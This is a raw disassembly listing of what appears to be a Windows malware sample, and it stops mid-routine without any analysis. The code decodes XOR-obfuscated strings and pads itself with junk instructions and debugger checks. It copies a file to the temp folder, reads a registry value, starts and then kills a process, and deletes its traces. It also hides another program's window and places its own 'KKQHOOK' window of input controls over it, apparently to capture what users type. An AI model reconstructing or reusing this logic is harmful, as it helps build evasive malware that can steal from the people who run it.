loc_408854: ; CODE XREF: sub_408779+D6�j
sar eax, 6
cmp [ebp+var_4], eax
jl short loc_40882F
push [ebp+lpAddress] ; lpAddress
call sub_40867D
mov [ebp+var_20], 2FAh
mov eax, [ebp+var_20]
mov edx, eax
add edx, eax
mov [ebp+var_20], edx
lea eax, [ebp+Buf1]
push eax
push [ebp+arg_8]
call sub_408741
mov eax, dword_44650C
add eax, 2
push eax ; Size
lea eax, [ebp+Buf2]
push eax ; Buf2
lea eax, [ebp+Buf1]
push eax ; Buf1
call memcmp ; memcmp
add esp, 18h
or eax, eax
jz short loc_4088A3
xor eax, eax
inc eax
jmp short loc_4088AA
; ---------------------------------------------------------------------------
loc_4088A3: ; CODE XREF: sub_408779+123�j
call IsDebuggerPresent ; IsDebuggerPresent
xor eax, eax
loc_4088AA: ; CODE XREF: sub_408779+128�j
pop edi
pop esi
pop ebx
leave
retn
sub_408779 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+0Ch]
push esi
push dword ptr [ebp+8]
mov eax, dword_44652C
lea eax, ds:439560h[eax]
push eax
call memcpy ; memcpy
add esp, 0Ch
mov dword ptr [ebp-4], 2A0h
xor edi, edi
jmp short loc_4088F5
; ---------------------------------------------------------------------------
loc_4088DE: ; CODE XREF: .text:004088F7�j
mov eax, dword_44652C
add eax, edi
lea eax, ds:439560h[eax]
movsx edx, byte ptr [eax]
xor edx, 1Bh
mov [eax], dl
inc edi
loc_4088F5: ; CODE XREF: .text:004088DC�j
cmp edi, esi
jl short loc_4088DE
mov dword ptr [ebp-8], 29Ch
mov eax, dword_44652C
add eax, esi
mov byte ptr dword_439560[eax], 0
mov edi, dword_44652C
mov eax, edi
inc eax
add eax, esi
mov dword_44652C, eax
cmp eax, 0DDFh
jle short loc_40892D
and dword_44652C, 0
loc_40892D: ; CODE XREF: .text:00408924�j
mov dword ptr [ebp-0Ch], 0D8h
lea eax, dword_439560[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40893E proc near ; CODE XREF: sub_4098A8+413�p
; sub_4098A8+42B�p
var_35 = byte ptr -35h
var_34 = byte ptr -34h
var_2C = dword ptr -2Ch
var_25 = byte ptr -25h
var_20 = byte ptr -20h
var_1E = word ptr -1Eh
var_1B = byte ptr -1Bh
var_15 = byte ptr -15h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
call GetVersion ; GetVersion
lea edi, [ebp+var_1B]
lea esi, aVlvh__0 ; "vlVh_"
mov ecx, 3
rep movsw
xor eax, eax
mov [ebp+var_10], eax
mov [ebp+var_14], eax
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
add eax, [ebp+var_8]
mov [ebp+var_C], eax
mov ebx, [ebp+arg_0]
jmp loc_408A7F
; ---------------------------------------------------------------------------
loc_40897F: ; CODE XREF: sub_40893E+14C�j
lea edi, [ebp+var_20]
lea esi, dword_446938
mov ecx, 5
rep movsb
movsx edi, byte ptr [ebx]
shl edi, 2
mov edi, dword_446538[edi]
mov [ebp+var_4], edi
call GetLastError
cmp edi, 0FFFFFFFFh
jz loc_408A7E
call GetCurrentThreadId ; GetCurrentThreadId
mov eax, [ebp+var_10]
or eax, eax
jl loc_408A78
cmp eax, 3
jg loc_408A78
jmp off_446948[eax*4]
; ---------------------------------------------------------------------------
mov [ebp+var_25], 38h
sub [ebp+var_25], 0BCh
loc_4089D5: ; CODE XREF: sub_40893E+88�j
; DATA XREF: .text:off_446948�o
inc [ebp+var_10]
lea edi, [ebp+var_34]
lea esi, byte_44693D
movsd
movsd
jmp loc_408A78
; ---------------------------------------------------------------------------
loc_4089E8: ; CODE XREF: sub_40893E+88�j
; DATA XREF: .text:0044694C�o
mov edi, [ebp+var_14]
shl edi, 2
mov esi, [ebp+var_4]
and esi, 30h
sar esi, 4
or edi, esi
mov edx, edi
mov [ebp+var_15], dl
call GetLastError
mov eax, [ebp+var_8]
inc [ebp+var_8]
mov dl, [ebp+var_15]
mov [eax], dl
inc [ebp+var_10]
jmp short loc_408A78
; ---------------------------------------------------------------------------
loc_408A13: ; CODE XREF: sub_40893E+88�j
; DATA XREF: .text:00446950�o
mov edi, [ebp+var_14]
and edi, 0Fh
shl edi, 4
mov esi, [ebp+var_4]
and esi, 3Ch
sar esi, 2
or edi, esi
mov edx, edi
mov [ebp+var_15], dl
lea edi, [ebp+var_35]
lea esi, byte_446945
xor ecx, ecx
inc ecx
rep movsb
mov eax, [ebp+var_8]
inc [ebp+var_8]
mov dl, [ebp+var_15]
mov [eax], dl
inc [ebp+var_10]
jmp short loc_408A78
; ---------------------------------------------------------------------------
loc_408A4A: ; CODE XREF: sub_40893E+88�j
; DATA XREF: .text:00446954�o
mov edi, [ebp+var_14]
and edi, 3
shl edi, 6
or edi, [ebp+var_4]
mov edx, edi
mov [ebp+var_15], dl
mov [ebp+var_2C], 6257h
add [ebp+var_2C], 0D1Fh
mov eax, [ebp+var_8]
inc [ebp+var_8]
mov dl, [ebp+var_15]
mov [eax], dl
and [ebp+var_10], 0
loc_408A78: ; CODE XREF: sub_40893E+79�j
; sub_40893E+82�j ...
mov eax, [ebp+var_4]
mov [ebp+var_14], eax
loc_408A7E: ; CODE XREF: sub_40893E+69�j
inc ebx
loc_408A7F: ; CODE XREF: sub_40893E+3C�j
cmp byte ptr [ebx], 0
jz short loc_408A90
mov eax, [ebp+var_C]
cmp [ebp+var_8], eax
jb loc_40897F
loc_408A90: ; CODE XREF: sub_40893E+144�j
cmp byte ptr [ebx], 0
jnz short loc_408AB1
mov [ebp+var_1E], 214Eh
movzx eax, [ebp+var_1E]
imul eax, 7B26h
mov [ebp+var_1E], ax
mov eax, [ebp+var_8]
sub eax, [ebp+arg_4]
jmp short loc_408AB4
; ---------------------------------------------------------------------------
loc_408AB1: ; CODE XREF: sub_40893E+155�j
or eax, 0FFFFFFFFh
loc_408AB4: ; CODE XREF: sub_40893E+171�j
pop edi
pop esi
pop ebx
leave
retn
sub_40893E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_408AB9(void *Src, size_t Size)
sub_408AB9 proc near ; CODE XREF: sub_408B4C+88�p
; sub_408B4C+E4�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Src = dword ptr 8
Size = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+Size]
push esi ; Size
push [ebp+Src] ; Src
mov eax, dword_446960
lea eax, ds:413F30h[eax]
push eax ; Dst
call memcpy ; memcpy
add esp, 0Ch
mov [ebp+var_4], 278h
xor edi, edi
jmp short loc_408B02
; ---------------------------------------------------------------------------
loc_408AE8: ; CODE XREF: sub_408AB9+4B�j
mov eax, dword_446960
add eax, edi
lea eax, ds:413F30h[eax]
movsx edx, byte ptr [eax]
xor edx, 9Ah
mov [eax], dl
inc edi
loc_408B02: ; CODE XREF: sub_408AB9+2D�j
cmp edi, esi
jl short loc_408AE8
mov [ebp+var_8], 2C7h
mov eax, dword_446960
add eax, esi
mov byte ptr dword_413F30[eax], 0
mov edi, dword_446960
mov eax, edi
lea eax, [eax+esi+6]
mov dword_446960, eax
cmp eax, 0DB8h
jle short loc_408B3B
and dword_446960, 0
loc_408B3B: ; CODE XREF: sub_408AB9+79�j
mov [ebp+var_C], 2EEh
lea eax, dword_413F30[edi]
pop edi
pop esi
leave
retn
sub_408AB9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408B4C proc near ; CODE XREF: sub_4098A8:loc_40A8A0�p
var_38C = dword ptr -38Ch
lpSubKey = dword ptr -388h
var_383 = dword ptr -383h
var_37F = byte ptr -37Fh
Type = dword ptr -378h
var_372 = word ptr -372h
var_370 = dword ptr -370h
cbData = dword ptr -36Ch
Data = byte ptr -365h
ProcessInformation= _PROCESS_INFORMATION ptr -261h
var_251 = byte ptr -251h
var_250 = byte ptr -250h
var_24F = byte ptr -24Fh
CommandLine = byte ptr -24Eh
var_14A = word ptr -14Ah
Dst = dword ptr -148h
var_11C = dword ptr -11Ch
var_118 = word ptr -118h
NewFileName = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 38Ch
push ebx
push esi
push edi
call IsDebuggerPresent ; IsDebuggerPresent
mov eax, dword_446964
mov [ebp+var_370], eax
call GetCurrentThreadId ; GetCurrentThreadId
lea eax, [ebp+NewFileName]
push eax ; lpBuffer
push 104h ; nBufferLength
call GetTempPathA ; GetTempPathA
mov [ebp+var_14A], 21A4h
movzx eax, [ebp+var_14A]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_14A], ax
lea ecx, [ebp+NewFileName]
or eax, 0FFFFFFFFh
loc_408BA4: ; CODE XREF: sub_408B4C+5D�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_408BA4
mov edi, eax
mov esi, dword_446958
add esi, 1
push esi
lea esi, [ebp+NewFileName]
add esi, edi
push esi
call sub_40172F
add esp, 8
call IsDebuggerPresent ; IsDebuggerPresent
push 4 ; Size
push offset dword_446E74 ; Src
call sub_408AB9
add esp, 8
push eax ; Source
lea edi, [ebp+NewFileName]
push edi ; Dest
call strcat ; strcat
add esp, 8
push 0 ; bFailIfExists
lea eax, [ebp+NewFileName]
push eax ; lpNewFileName
push offset ExistingFileName ; lpExistingFileName
call CopyFileA ; CopyFileA
call GetLastError
mov ax, word_446968
mov [ebp+var_372], ax
mov [ebp+cbData], 104h
mov [ebp+var_24F], 22h
sub [ebp+var_24F], 0CDh
push 21h ; Size
push offset word_446E52 ; Src
call sub_408AB9
add esp, 8
mov [ebp+lpSubKey], eax
push 4 ; Size
push offset byte_446E4D ; Src
call sub_408AB9
add esp, 8
lea edi, [ebp+Type]
push edi ; lpType
lea edi, [ebp+cbData]
push edi ; lpcbData
lea edi, [ebp+Data]
push edi ; lpData
push eax ; lpValueName
mov edi, [ebp+lpSubKey]
push [ebp+lpSubKey] ; lpSubKey
push 80000002h ; hKey
call sub_4014C9
add esp, 18h
mov ebx, eax
call IsDebuggerPresent ; IsDebuggerPresent
cmp ebx, 0
jz loc_408E0D
call GetProcessHeap ; GetProcessHeap
lea edi, [ebp+var_37F]
lea esi, word_44696A
mov ecx, 7
rep movsb
push 104h ; nSize
lea eax, [ebp+CommandLine]
push eax ; lpDst
lea eax, [ebp+Data]
push eax ; lpSrc
call ExpandEnvironmentStringsA ; ExpandEnvironmentStringsA
call GetVersion ; GetVersion
push 0Eh ; Size
push offset word_446E3E ; Src
call sub_408AB9
push eax ; Source
lea edi, [ebp+CommandLine]
push edi ; Dest
call strcat ; strcat
call GetTickCount ; GetTickCount
lea eax, [ebp+NewFileName]
push eax ; Source
lea eax, [ebp+CommandLine]
push eax ; Dest
call strcat ; strcat
call GetLastError
call sub_4043CA
mov ebx, eax
mov eax, dword_446971
mov [ebp+var_383], eax
push 44h ; Size
push 0 ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call memset ; memset
push 44h ; Size
push 0 ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call memset ; memset
add esp, 30h
mov [ebp+var_250], 69h
add [ebp+var_250], 1
mov [ebp+Dst], 44h
mov [ebp+var_251], 19h
movzx eax, [ebp+var_251]
imul eax, 1598h
mov [ebp+var_251], al
mov [ebp+var_11C], 1
mov [ebp+var_118], 1
or ebx, ebx
jz short loc_408D84
lea eax, [ebp+Dst]
push eax
call sub_40446E
pop ecx
jmp short loc_408D8D
; ---------------------------------------------------------------------------
loc_408D84: ; CODE XREF: sub_408B4C+227�j
mov [ebp+var_118], 0
loc_408D8D: ; CODE XREF: sub_408B4C+236�j
lea eax, [ebp+ProcessInformation]
push eax ; lpProcessInformation
lea eax, [ebp+Dst]
push eax ; lpStartupInfo
push 0 ; lpCurrentDirectory
push 0 ; lpEnvironment
push 20h ; dwCreationFlags
push 0 ; bInheritHandles
push 0 ; lpThreadAttributes
push 0 ; lpProcessAttributes
lea eax, [ebp+CommandLine]
push eax ; lpCommandLine
push 0 ; lpApplicationName
call CreateProcessA ; CreateProcessA
or eax, eax
jz short loc_408E01
call GetCurrentProcessId ; GetCurrentProcessId
push [ebp+ProcessInformation.hThread] ; hObject
call CloseHandle ; CloseHandle
mov eax, dword_446975
mov [ebp+var_38C], eax
push 0EA60h ; Duration
call _sleep ; _sleep
pop ecx
call IsDebuggerPresent ; IsDebuggerPresent
push 0 ; uExitCode
push [ebp+ProcessInformation.hProcess] ; hProcess
call TerminateProcess ; TerminateProcess
push [ebp+ProcessInformation.hProcess] ; hObject
call CloseHandle ; CloseHandle
call GetCurrentThreadId ; GetCurrentThreadId
loc_408E01: ; CODE XREF: sub_408B4C+26B�j
lea eax, [ebp+NewFileName]
push eax ; lpFileName
call DeleteFileA ; DeleteFileA
loc_408E0D: ; CODE XREF: sub_408B4C+13A�j
pop edi
pop esi
pop ebx
leave
retn
sub_408B4C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_408E12(HWND hWnd, int)
sub_408E12 proc near ; CODE XREF: sub_408ED0+2C�p
; sub_408ED0+46�p ...
var_1018 = byte ptr -1018h
var_1011 = byte ptr -1011h
var_1009 = byte ptr -1009h
ClassName = byte ptr -1001h
var_2 = word ptr -2
hWnd = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1018h
call sub_40C6B8
push ebx
push esi
push edi
lea edi, [ebp+var_1009]
lea esi, byte_446979
movsd
movsd
push 5 ; uCmd
push [ebp+hWnd] ; hWnd
call GetWindow ; GetWindow
mov ebx, eax
loc_408E3C: ; CODE XREF: sub_408E12+B4�j
or ebx, ebx
jnz short loc_408E47
xor eax, eax
jmp loc_408ECB
; ---------------------------------------------------------------------------
loc_408E47: ; CODE XREF: sub_408E12+2C�j
mov [ebp+var_2], 6C09h
movzx eax, [ebp+var_2]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_2], ax
push 0FFFh ; nMaxCount
lea eax, [ebp+ClassName]
push eax ; lpClassName
push ebx ; hWnd
call GetClassNameA ; GetClassNameA
lea edi, [ebp+var_1011]
lea esi, aHjvmnia ; "hJVmnIA"
movsd
movsd
mov eax, 13h
sub eax, dword_43C098
push eax
push [ebp+arg_4]
lea eax, [ebp+ClassName]
push eax
call sub_40181A
add esp, 0Ch
cmp eax, 0FFFFh
jz short loc_408EA4
mov eax, ebx
jmp short loc_408ECB
; ---------------------------------------------------------------------------
loc_408EA4: ; CODE XREF: sub_408E12+8C�j
call GetCurrentProcessId ; GetCurrentProcessId
push 2 ; uCmd
push ebx ; hWnd
call GetWindow ; GetWindow
mov ebx, eax
lea edi, [ebp+var_1018]
lea esi, aP_rX ; "p+_R'X"
mov ecx, 7
rep movsb
jmp loc_408E3C
; ---------------------------------------------------------------------------
loc_408ECB: ; CODE XREF: sub_408E12+30�j
; sub_408E12+90�j
pop edi
pop esi
pop ebx
leave
retn
sub_408E12 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_408ED0(HWND hWnd)
sub_408ED0 proc near ; CODE XREF: sub_40B3E8+1D6�p
var_184 = dword ptr -184h
var_180 = dword ptr -180h
var_179 = byte ptr -179h
var_178 = dword ptr -178h
lParam = byte ptr -172h
var_170 = dword ptr -170h
var_16C = dword ptr -16Ch
lpClassName = dword ptr -168h
var_163 = byte ptr -163h
var_15D = byte ptr -15Dh
var_158 = byte ptr -158h
var_150 = dword ptr -150h
var_14C = byte ptr -14Ch
var_146 = byte ptr -146h
var_143 = byte ptr -143h
var_13B = byte ptr -13Bh
var_138 = byte ptr -138h
wParam = dword ptr -130h
var_12C = dword ptr -12Ch
var_126 = word ptr -126h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_119 = byte ptr -119h
var_118 = word ptr -118h
var_116 = word ptr -116h
var_114 = word ptr -114h
Rect = tagRECT ptr -112h
WindowName = byte ptr -102h
var_3 = byte ptr -3
var_2 = word ptr -2
hWnd = dword ptr 8
push ebp
mov ebp, esp
sub esp, 184h
push ebx
push esi
push edi
mov [ebp+var_118], 37B0h
inc [ebp+var_118]
push 9 ; Size
push offset aRIA ; "»·›¶¾±· "
call sub_40129C
push eax ; int
push [ebp+hWnd] ; hWnd
call sub_408E12
mov ebx, eax
call GetCurrentProcessId ; GetCurrentProcessId
push 8 ; Size
push offset aSmdJJ ; "‘¬¤¸»¦±¦"
call sub_40129C
push eax ; int
push ebx ; hWnd
call sub_408E12
mov hWnd, eax
mov [ebp+var_114], 6B90h
movzx eax, [ebp+var_114]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_114], ax
push 0 ; nCmdShow
push hWnd ; hWnd
call ShowWindow ; ShowWindow
call GetTickCount ; GetTickCount
lea eax, [ebp+Rect]
push eax ; lpRect
push ebx ; hWnd
call GetWindowRect ; GetWindowRect
mov [ebp+var_119], 0EFh
add [ebp+var_119], 0D4h
push 0 ; lpParam
push hInstance ; hInstance
push 0 ; hMenu
push ebx ; hWndParent
mov eax, [ebp+Rect.bottom]
sub eax, [ebp+Rect.top]
push eax ; nHeight
mov eax, [ebp+Rect.right]
sub eax, [ebp+Rect.left]
push eax ; nWidth
push 0 ; Y
push 0 ; X
push 50800000h ; dwStyle
push offset WindowName ; lpWindowName
push offset ClassName ; "KKQHOOK"
push 200h ; dwExStyle
call CreateWindowExA ; CreateWindowExA
mov hWndParent, eax
lea edi, [ebp+var_138]
lea esi, aFxTE ; "fX $t!E"
movsd
movsd
push 6 ; Size
push offset byte_446E1B ; Src
call sub_40129C
mov [ebp+lpClassName], eax
push 19h ; Size
push offset byte_446E01 ; Src
call sub_40129C
push 0 ; lpParam
push hInstance ; hInstance
push 0 ; hMenu
push hWndParent ; hWndParent
mov edi, dword_43C098
mov esi, edi
add esi, 2Ah
push esi ; nHeight
mov esi, [ebp+Rect.right]
sub esi, [ebp+Rect.left]
sub esi, 64h
push esi ; nWidth
add edi, 2
push edi ; Y
push edi ; X
push 50800000h ; dwStyle
push eax ; lpWindowName
mov edi, [ebp+lpClassName]
push edi ; lpClassName
push 0 ; dwExStyle
call CreateWindowExA ; CreateWindowExA
mov dword_41D898, eax
call GetProcessHeap ; GetProcessHeap
push 6 ; Size
push offset byte_446E1B ; Src
call sub_40129C
push 0 ; lpParam
push hInstance ; hInstance
push 0 ; hMenu
push hWndParent ; hWndParent
mov edi, dword_43C098
add edi, 11Ah
push edi ; nHeight
mov edi, [ebp+Rect.right]
sub edi, [ebp+Rect.left]
sub edi, 64h
push edi ; nWidth
mov edi, dword_43C098
add edi, 3Fh
push edi ; Y
mov edi, dword_43C098
add edi, 2
push edi ; X
push 50800009h ; dwStyle
push offset WindowName ; lpWindowName
push eax ; lpClassName
push 0 ; dwExStyle
call CreateWindowExA ; CreateWindowExA
mov dword_430C28, eax
call GetCurrentThreadId ; GetCurrentThreadId
push 0 ; pszFaceName
push 2 ; iPitchAndFamily
push 0 ; iQuality
push 0 ; iClipPrecision
push 5 ; iOutPrecision
push 1 ; iCharSet
push 0 ; bStrikeOut
push 0 ; bUnderline
push 0 ; bItalic
push 2BCh ; cWeight
push 0 ; cOrientation
push 0 ; cEscapement
mov eax, dword_43C098
mov edx, 1Ah
sub edx, eax
push edx ; cWidth
mov eax, dword_43C098
add eax, 2
push eax ; cHeight
call CreateFontA ; CreateFontA
mov [ebp+wParam], eax
lea edi, [ebp+var_13B]
lea esi, aQa ; "qA"
mov ecx, 3
rep movsb
push 1 ; lParam
push [ebp+wParam] ; wParam
push 30h ; Msg
push dword_41D898 ; hWnd
call SendMessageA ; SendMessageA
push 8 ; Size
push offset dword_446DF8 ; Src
call sub_40129C
push 0 ; lpParam
push hInstance ; hInstance
push 0 ; hMenu
push dword_430C28 ; hWndParent
mov edi, dword_43C098
add edi, 11Ah
push edi ; nHeight
mov edi, dword_43C098
add edi, 20h
push edi ; nWidth
mov edi, dword_43C098
add edi, 28h
push edi ; Y
mov edi, dword_43C098
add edi, 2
push edi ; X
push 50800003h ; dwStyle
push offset WindowName ; lpWindowName
push eax ; lpClassName
push 0 ; dwExStyle
call CreateWindowExA ; CreateWindowExA
mov dword_432DC0, eax
push 8 ; Size
push offset dword_446DF8 ; Src
call sub_40129C
add esp, 48h
push 0 ; lpParam
push hInstance ; hInstance
push 0 ; hMenu
push dword_430C28 ; hWndParent
mov edi, dword_43C098
add edi, 11Ah
push edi ; nHeight
mov edi, dword_43C098
add edi, 2Ah
push edi ; nWidth
mov edi, dword_43C098
add edi, 28h
push edi ; Y
mov edi, dword_43C094
add edi, 4Dh
push edi ; X
push 50800003h ; dwStyle
push offset WindowName ; lpWindowName
push eax ; lpClassName
push 0 ; dwExStyle
call CreateWindowExA ; CreateWindowExA
mov dword_41E8C4, eax
mov [ebp+var_116], 5444h
movzx eax, [ebp+var_116]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_116], ax
mov [ebp+var_2], 1
jmp loc_409299
; ---------------------------------------------------------------------------
loc_4091E0: ; CODE XREF: sub_408ED0+3D0�j
call IsDebuggerPresent ; IsDebuggerPresent
lea edi, [ebp+var_179]
lea esi, byte_44699B
xor ecx, ecx
inc ecx
rep movsb
push 4 ; Size
push offset byte_446DF3 ; Src
call sub_40129C
movzx edi, [ebp+var_2]
push edi
push eax ; Format
lea edi, [ebp+lParam]
push edi ; Dest
call sprintf ; sprintf
mov [ebp+var_178], 269Fh
mov eax, 5D57h
mul [ebp+var_178]
mov [ebp+var_180], eax
mov [ebp+var_178], eax
lea eax, [ebp+lParam]
push eax ; lParam
push 0 ; wParam
push 143h ; Msg
push dword_432DC0 ; hWnd
call SendMessageA ; SendMessageA
push 6 ; Size
push offset dword_446DEC ; Src
call sub_40129C
movzx edi, [ebp+var_2]
add edi, 4
push edi
push eax ; Format
lea edi, [ebp+lParam]
push edi ; Dest
call sprintf ; sprintf
add esp, 28h
call GetVersion ; GetVersion
lea eax, [ebp+lParam]
push eax ; lParam
push 0 ; wParam
push 143h ; Msg
push dword_41E8C4 ; hWnd
call SendMessageA ; SendMessageA
call GetCurrentThreadId ; GetCurrentThreadId
inc [ebp+var_2]
loc_409299: ; CODE XREF: sub_408ED0+30B�j
movzx eax, [ebp+var_2]
cmp eax, 0Dh
jl loc_4091E0
push 6 ; Size
push offset byte_446E1B ; Src
call sub_40129C
mov [ebp+var_16C], eax
push 10h ; Size
push offset byte_446DDB ; Src
call sub_40129C
push 0 ; lpParam
push hInstance ; hInstance
push 0 ; hMenu
push hWndParent ; hWndParent
mov edi, dword_43C098
mov esi, 22h
sub esi, edi
push esi ; nHeight
mov edi, dword_43C098
add edi, 55h
push edi ; nWidth
mov edi, dword_43C098
add edi, 5Ch
push edi ; Y
mov edi, dword_43C098
add edi, 0B1h
push edi ; X
push 50000000h ; dwStyle
push eax ; lpWindowName
mov edi, [ebp+var_16C]
push edi ; lpClassName
push 0 ; dwExStyle
call CreateWindowExA ; CreateWindowExA
mov dword_413F20, eax
push 6 ; Size
push offset byte_446E1B ; Src
call sub_40129C
mov [ebp+var_170], eax
push 0Fh ; Size
push offset byte_446DCB ; Src
call sub_40129C
push 0 ; lpParam
push hInstance ; hInstance
push 0 ; hMenu
push hWndParent ; hWndParent
mov edi, dword_43C094
add edi, 0Bh
push edi ; nHeight
mov edi, dword_43C098
add edi, 45h
push edi ; nWidth
mov edi, dword_43C098
add edi, 7Fh
push edi ; Y
mov edi, dword_43C094
add edi, 0BEh
push edi ; X
push 50000000h ; dwStyle
push eax ; lpWindowName
mov edi, [ebp+var_170]
push edi ; lpClassName
push 0 ; dwExStyle
call CreateWindowExA ; CreateWindowExA
mov dword_432DB8, eax
push 6 ; Size
push offset byte_446E1B ; Src
call sub_40129C
mov [ebp-174h], eax
push 0Ch ; Size
push offset word_446DBE ; Src
call sub_40129C
push 0 ; lpParam
push hInstance ; hInstance
push 0 ; hMenu
push hWndParent ; hWndParent
mov edi, dword_43C094
add edi, 0Bh
push edi ; nHeight
mov edi, dword_43C098
add edi, 44h
push edi ; nWidth
mov edi, dword_43C098
add edi, 0A7h
push edi ; Y
mov edi, dword_43C098
add edi, 0B1h
push edi ; X
push 50000000h ; dwStyle
push eax ; lpWindowName
mov edi, [ebp-174h]
push edi ; lpClassName
push 0 ; dwExStyle
call CreateWindowExA ; CreateWindowExA
mov dword_4351D8, eax
push 6 ; Size
push offset byte_446E1B ; Src
call sub_40129C
mov [ebp+var_178], eax
push 4Ah ; Size
push offset byte_446D73 ; Src
call sub_40129C
push 0 ; lpParam
push hInstance ; hInstance
push 0 ; hMenu
push hWndParent ; hWndParent
mov edi, dword_43C098
mov esi, 22h
sub esi, edi
push esi ; nHeight
mov edi, dword_43C098
add edi, 1D2h
push edi ; nWidth
mov edi, dword_43C098
add edi, 0D4h
push edi ; Y
mov edi, dword_43C094
add edi, 19h
push edi ; X
push 50000000h ; dwStyle
push eax ; lpWindowName
mov edi, [ebp+var_178]
push edi ; lpClassName
push 0 ; dwExStyle
call CreateWindowExA ; CreateWindowExA
mov dword_432DBC, eax
push 6 ; Size
push offset byte_446E1B ; Src
call sub_40129C
mov [ebp-17Ch], eax
push 26h ; Size
push offset dword_446D4C ; Src
call sub_40129C
push 0 ; lpParam
push hInstance ; hInstance
push 0 ; hMenu
push hWndParent ; hWndParent
mov edi, dword_43C094
add edi, 0Bh
push edi ; nHeight
mov edi, dword_43C098
add edi, 0EBh
push edi ; nWidth
mov edi, dword_43C094
add edi, 0FAh
push edi ; Y
mov edi, dword_43C098
add edi, 0Ch
push edi ; X
push 50000000h ; dwStyle
push eax ; lpWindowName
mov edi, [ebp-17Ch]
push edi ; lpClassName
push 0 ; dwExStyle
call CreateWindowExA ; CreateWindowExA
mov dword_43A558, eax
push offset Format ; Format
lea eax, [ebp+WindowName]
push eax ; Dest
call sprintf ; sprintf
add esp, 58h
lea edi, [ebp+var_143]
lea esi, aZ_y9am4 ; "z.y9aM4"
movsd
movsd
mov [ebp+var_3], 4
jmp short loc_409529
; ---------------------------------------------------------------------------
loc_409519: ; CODE XREF: sub_408ED0+65E�j
movzx eax, [ebp+var_3]
mov [ebp+eax+WindowName], 78h
add [ebp+var_3], 1
loc_409529: ; CODE XREF: sub_408ED0+647�j
mov al, [ebp+var_3]
cmp al, 0Ch
jb short loc_409519
call IsDebuggerPresent ; IsDebuggerPresent
push 4 ; Size
push offset byte_446D47 ; Src
call sub_40129C
push 0 ; lpParam
push hInstance ; hInstance
push 0 ; hMenu
push dword_430C28 ; hWndParent
mov edi, dword_43C098
mov esi, edi
add esi, 6
push esi ; nHeight
mov esi, edi
add esi, 70h
push esi ; nWidth
add edi, 2
push edi ; Y
push edi ; X
push 50800800h ; dwStyle
lea edi, [ebp+WindowName]
push edi ; lpWindowName
push eax ; lpClassName
push 200h ; dwExStyle
call CreateWindowExA ; CreateWindowExA
mov dword_41081C, eax
mov [ebp+var_120], 70h
mov eax, 829h
mul [ebp+var_120]
mov [ebp+var_180], eax
mov [ebp+var_120], eax
push 4 ; Size
push offset byte_446D47 ; Src
call sub_40129C
push 0 ; lpParam
push hInstance ; hInstance
push 0 ; hMenu
push dword_430C28 ; hWndParent
mov edi, dword_43C098
add edi, 6
push edi ; nHeight
mov edi, dword_43C094
add edi, 41h
push edi ; nWidth
mov edi, dword_43C098
add edi, 4Dh
push edi ; Y
mov edi, dword_43C098
add edi, 2
push edi ; X
push 50800000h ; dwStyle
push offset WindowName ; lpWindowName
push eax ; lpClassName
push 200h ; dwExStyle
call CreateWindowExA ; CreateWindowExA
mov dword_41E8BC, eax
lea edi, [ebp+var_146]
lea esi, a3h ; "3h"
mov ecx, 3
rep movsb
push 0 ; lParam
push 78h ; wParam
push 0CCh ; Msg
push dword_41E8BC ; hWnd
call SendMessageA ; SendMessageA
call GetCurrentProcessId ; GetCurrentProcessId
push 6 ; Size
push offset dword_446D40 ; Src
call sub_40129C
mov [ebp+var_184], eax
push 16h ; Size
push offset byte_446D29 ; Src
call sub_40129C
add esp, 20h
push 0 ; lpParam
push hInstance ; hInstance
push 0 ; hMenu
push hWndParent ; hWndParent
mov edi, dword_43C098
add edi, 5
push edi ; nHeight
mov edi, dword_43C094
add edi, 96h
push edi ; nWidth
mov edi, dword_43C098
add edi, 12Eh
push edi ; Y
mov edi, dword_43C098
add edi, 0Ch
push edi ; X
push 50800000h ; dwStyle
push eax ; lpWindowName
mov edi, [ebp+var_184]
push edi ; lpClassName
push 0 ; dwExStyle
call CreateWindowExA ; CreateWindowExA
mov dword_4351DC, eax
push 0 ; pszFaceName
push 2 ; iPitchAndFamily
push 0 ; iQuality
push 0 ; iClipPrecision
push 5 ; iOutPrecision
push 1 ; iCharSet
push 0 ; bStrikeOut
push 0 ; bUnderline
push 0 ; bItalic
push 190h ; cWeight
push 0 ; cOrientation
push 0 ; cEscapement
mov eax, dword_43C094
inc eax
push eax ; cWidth
mov eax, 22h
sub eax, dword_43C098
push eax ; cHeight
call CreateFontA ; CreateFontA
mov ebx, eax
call GetVersion ; GetVersion
push 1 ; lParam
push ebx ; wParam
push 30h ; Msg
push dword_432DC0 ; hWnd
call SendMessageA ; SendMessageA
lea edi, [ebp+var_14C]
lea esi, aOi6 ; " oi%6"
mov ecx, 3
rep movsw
push 1 ; lParam
push ebx ; wParam
push 30h ; Msg
push dword_41E8C4 ; hWnd
call SendMessageA ; SendMessageA
mov eax, dword_4469AD
mov [ebp+var_150], eax
